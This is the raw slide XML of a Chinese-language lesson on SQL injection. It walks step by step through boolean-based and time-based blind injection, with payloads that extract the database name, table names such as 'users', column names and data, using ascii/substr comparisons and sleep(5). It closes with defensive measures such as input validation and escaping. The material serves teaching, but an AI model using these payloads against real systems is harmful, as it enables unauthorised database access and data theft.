                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABEB5079-225D-E031-F606-B149DF695106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841500" y="2425535"/>
            <a:ext cx="8509000" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2954FFC5-51D0-3B8B-CEEC-9928A5B76EC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>
            <a:ext cx="7571303"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第一步：判断是否存在注入，注入是字符型还是数字型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73399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658463"/>
            <a:ext cx="10513814"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想要猜解数据库名，首先要猜解数据库名的长度，然后挨个猜解字符。</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length(database())=1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length(database())=2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length(database())=3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length(database())=4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显示存在：说明数据库名长度为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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E630869F-C1A0-17C9-7797-4814334ECD2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1818061" y="3716661"/>
            <a:ext cx="8496300" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F92E2C3B-720C-B1FA-99CE-688A09F643DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>
            <a:ext cx="449353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第二步：猜解当前数据库名长度</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1564861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715570"/>
            <a:ext cx="10513814" cy="4373120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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(database(),1,1))&gt;97 #</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值大于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97</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(database(),1,1))&lt;122 #</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值小于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122</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z</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(database(),1,1))&lt;109 #</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值小于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109</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m</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(database(),1,1))&lt;103 #</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值小于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103</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g</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(database(),1,1))&lt;100 #</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值不小于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100</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a:t>
            </a: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(database(),1,1))&gt;100 #</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显示不存在，说明数据库名的第一个字符的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值不大于</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100</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值），所以数据库名的第一个字符的</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ascii</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值为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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100</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，即小写字母</a:t>
            </a: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d</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重复上述步骤，就可以猜解出完整的数据库名（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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zh-CN" altLang="en" sz="16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了。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2201A4D7-3719-17CA-DEDA-22186427335B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>
            <a:ext cx="387798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第三步：猜解当前数据库名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37492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771365"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917550" y="1700808"/>
            <a:ext cx="4824536" cy="198079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结构化查询语言（</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Structured Query Language</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简称</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是用于访问和处理数据库的标准的计算机语言，在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世纪</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70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年代由</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IBM</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公司创建，于</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1992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年作为国际标准纳入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ANSI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组成</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5905" y="1713192"/>
            <a:ext cx="4824536" cy="3134961"/>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由两部分组成：</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数据定义语言</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 Definition Language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DDL</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用于定义数据库结构。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数据操作语言</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 Manipulation Language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DML</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用于对数据库进行查询或更新 。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4022951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093" y="1719592"/>
            <a:ext cx="10513814" cy="2365519"/>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(select count(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=database())=1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(select count(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=database())=2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显示存在</a:t>
            </a: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说明数据库中共有两个表。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E1EEEA6-CE1A-1406-3F7A-AC1F885ADA55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>
            <a:ext cx="449353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第四步：猜解数据库中表的数量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3930934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716665"/>
            <a:ext cx="10513814" cy="3904402"/>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length(</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0,1),1))=2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length(</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0,1),1))=9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显示存在，说明第一个表名长度为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9</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3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55A1097-CD7C-1747-4525-746D710DFE5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>
            <a:ext cx="326243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第五步：猜解表名长度</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44771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45535" y="1614933"/>
            <a:ext cx="10513814" cy="4673780"/>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0,1),1,1))&gt;97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0,1),1,1))&lt;122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0,1),1,1))&lt;109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0,1),1,1))&lt;103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from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information_schema.tables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table_schema</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 limit 0,1),1,1))&gt;103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说明第一个表的名字的第一个字符为小写字母</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重复上述步骤，即可猜解出两个表名（</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guestbook</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users</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
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E148B24-DA00-3741-BB46-1F53721C6423}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>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第六步：二分法猜解表名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4055116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639981"/>
            <a:ext cx="10513814" cy="3519681"/>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(select count(column_name) from information_schema.columns where table_name= 'users')=1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(select count(column_name) from information_schema.columns where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table_name</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='user</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6</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a:t>
            </a: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说明</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users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表有</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6</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>个</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字段。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A25E99ED-ADAB-1A80-060F-B140B529A76B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>
            <a:ext cx="4185761"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第七步：猜解表中字段的数量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3436041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721403"/>
            <a:ext cx="10513814" cy="4289123"/>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and length(substr((select column_name from information_schema.columns where table_name= ' users ' limit 0,1),1))=1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显示不存在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and length(substr((select column_name from information_schema.columns where table_name= ' users ' limit 0,1),1))=7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显示存在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说明</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users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表的第一个字段为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7</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个字符长度。</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采用二分法，即可猜解出所有字段名。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38BA67B6-44F2-AF96-D7C7-D04842E983C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>
            <a:ext cx="357020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第八步：挨个猜解字段名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1689440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839416" y="1719592"/>
            <a:ext cx="10513814"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重复以上步骤，可以猜解到表中所有数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAC4C6A1-CE74-9D50-5E1C-CF9370CAFFA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>
            <a:ext cx="5109091"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第九步：继续用二分法猜解表中数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83991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2D4A867-CFF9-DC14-04DD-0010D12BBCBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766763" y="1628800"/>
            <a:ext cx="10513814" cy="4673780"/>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首先判断是否存在注入，注入是字符型还是数字型：</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and sleep(5)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感觉到明显延迟</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sleep(5) #</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没有延迟</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说明存在字符型的基于时间的盲注。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猜解当前数据库名字长度：</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if(length(database())=1,sleep(5),1)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没有延迟</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if(length(database())=4,sleep(5),1) #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明显延迟</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采用二分法猜解数据库名：</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and if(ascii(</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substr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(database(),1,1))&gt;97,sleep(5),1)#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明显延迟</a:t>
            </a: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以此类推，猜解表、字段和数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49ADE2F4-5A4C-659A-11BA-F5B5E1F613C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1155220"/>
            <a:ext cx="2925801"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基于时间的</a:t>
            </a:r>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盲注</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352823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F46A716-84EB-3AF4-E740-B0398A413175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="635001"/>
            <a:ext cx="9753600" cy="1497856"/>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SQL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盲注的时候，如果执行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en" altLang="zh-CN" sz="280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and if(length(database())=4,sleep(5),3) #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存在明显延迟，说明</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E9259D3-D40E-AD1A-62BE-94BA833E2861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="227687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数据库中字段个数为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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7191B3FF-EDD1-DD71-FFEE-80C848F504D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="313412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数据库中表的个数为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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFF069D0-5D17-5E10-C864-DE78EAF3493C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="3991372"/>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当前数据库的名字长度为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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="椭圆 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B779C65B-B616-1C2C-43A2-A7F37A8CCAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="234116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55394975-9AA5-5421-2DCD-EF8A0E882972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="319841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8298C396-B860-3390-8C74-B6E83C8D3486}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="405566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5" name="矩形: 圆角 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4006B489-CD2A-263D-0A03-0C88B1B13486}"/>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10521DFD-8109-3A16-F59F-ADA0CD05BB2F}"/>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5841C0C1-80F4-5DEC-8D8B-E21DF5375F6F}"/>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55A1D347-DFAE-00E3-D79F-B3A24AEC3CB7}"/>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00BA9DED-046B-0C18-BB99-76B7B147EF44}"/>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CFE77EFD-1D7F-506E-43C6-8166D2CC1A0C}"/>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8198043B-24D6-41ED-3BDA-7C8845D62565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1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00824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E65C85FF-4C05-9148-D7BB-2A412450A628}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="915973" y="2308056"/>
            <a:ext cx="10360054" cy="603084"/>
            <a:chOff x="766764" y="1052512"/>
            <a:chExt cx="10360054" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="矩形 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B22945-87DE-0E3A-13E4-5CCE2C23E8D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="766764" y="1052513"/>
              <a:ext cx="8644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ADDA4203-C425-5D22-956C-C13BF9879111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1631182" y="1052512"/>
              <a:ext cx="9495636"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在服务端正式处理之前对提交数据的合法性进行检查</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="组合 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09AC8036-0F20-1B37-A637-A7BDD1BD77C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="911424" y="3113948"/>
            <a:ext cx="10369152" cy="603084"/>
            <a:chOff x="766764" y="1052512"/>
            <a:chExt cx="10369152" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="矩形 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9144FE-3205-04AE-EC83-F1383B18201F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="766764" y="1052513"/>
              <a:ext cx="8644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D8516D8A-E713-CA95-C940-C49CB08D5AAB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1631182" y="1052512"/>
              <a:ext cx="950473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封装客户端提交信息</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="组合 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F42DB1CE-E415-E6E4-2105-749158D06976}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="911424" y="3945538"/>
            <a:ext cx="10364603" cy="603084"/>
            <a:chOff x="766764" y="1052512"/>
            <a:chExt cx="10364603" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="矩形 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85457D2A-1B4B-C528-89E4-A4EA2722C9DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="766764" y="1052513"/>
              <a:ext cx="8644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06365469-D07F-BF48-A8B7-E841BA97156B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1631182" y="1052512"/>
              <a:ext cx="9500185"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替换或删除敏感字符</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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="组合 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A3BB1D1-CA5C-56D8-81ED-C13C362733EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="915973" y="4777127"/>
            <a:ext cx="10364603" cy="603084"/>
            <a:chOff x="766764" y="1052512"/>
            <a:chExt cx="10658472" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="矩形 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76D5CF92-446D-7225-4B37-D6F07D0A4DE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="766764" y="1052513"/>
              <a:ext cx="8644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A02E9339-6633-1BB2-B111-E97ACF722158}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1631182" y="1052512"/>
              <a:ext cx="979405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屏蔽出错信息</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9EF5A12-D3CD-EC19-434B-218CF652D062}"/>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8995230-BFDE-873D-9CB8-382A1F527E25}"/>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防御措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11F2DE8E-CE81-C079-5D2D-9A3F60D510E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1706792"/>
            <a:ext cx="10513814" cy="44191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由于越来越多的攻击使用了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注入技术，也随之产生了很多试图解决</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注入漏洞的方案：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="512233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4532010"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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 对提交数据的合法性进行检查</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7550" y="1712452"/>
            <a:ext cx="4890418" cy="313489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被公认是最根本的解决方案，在确认客户端的输入合法之前，服务端拒绝进行关键性的处理操作，不过这需要开发者能够以一种安全的方式来构建网络应用程序，虽然已有大量针对在网络应用程序开发中如何安全地访问数据库的文档出版，但仍然有很多开发者缺乏足够的安全意识，造成开发出的产品中依旧存在注入漏洞。</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7094" y="1712452"/>
            <a:ext cx="4895489" cy="82657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需要</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RDBMS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的支持，目前只有</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Oracle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采用该技术。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
